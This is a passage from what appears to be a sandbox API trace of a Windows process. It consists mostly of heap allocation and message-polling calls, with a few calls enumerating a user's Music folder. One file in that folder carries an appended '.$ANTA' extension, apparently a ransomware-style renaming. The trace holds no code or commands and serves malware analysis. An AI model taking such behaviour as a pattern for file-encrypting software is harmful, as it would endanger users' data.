dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36) returned 0x41ac180 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.195] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.195] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.195] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.196] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0118.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.196] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\" (normalized: "c:\\users\\fd1hvy\\music\\tg2o")) returned 0x10 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.197] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.197] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.198] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0118.199] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0x1294c483, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1294c483, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName=".", cAlternateFileName="")) returned 0x41ac540 [0118.199] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0x1294c483, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1294c483, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName="..", cAlternateFileName="")) returned 1 [0118.199] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x126fc349, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x126fc349, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1276ea6c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7480, dwReserved0=0x0, dwReserved1=0x43ca2f8, cFileName="KxIfNFq_eT6K4Yywd.m4a.$ANTA", cAlternateFileName="KXIFNF~1.$AN")) returned 1 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.199] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.200] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.200] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0118.200] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.200] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.201] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.201] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.201] RtlAllocateHeap (HeapHandle=0x1780000, 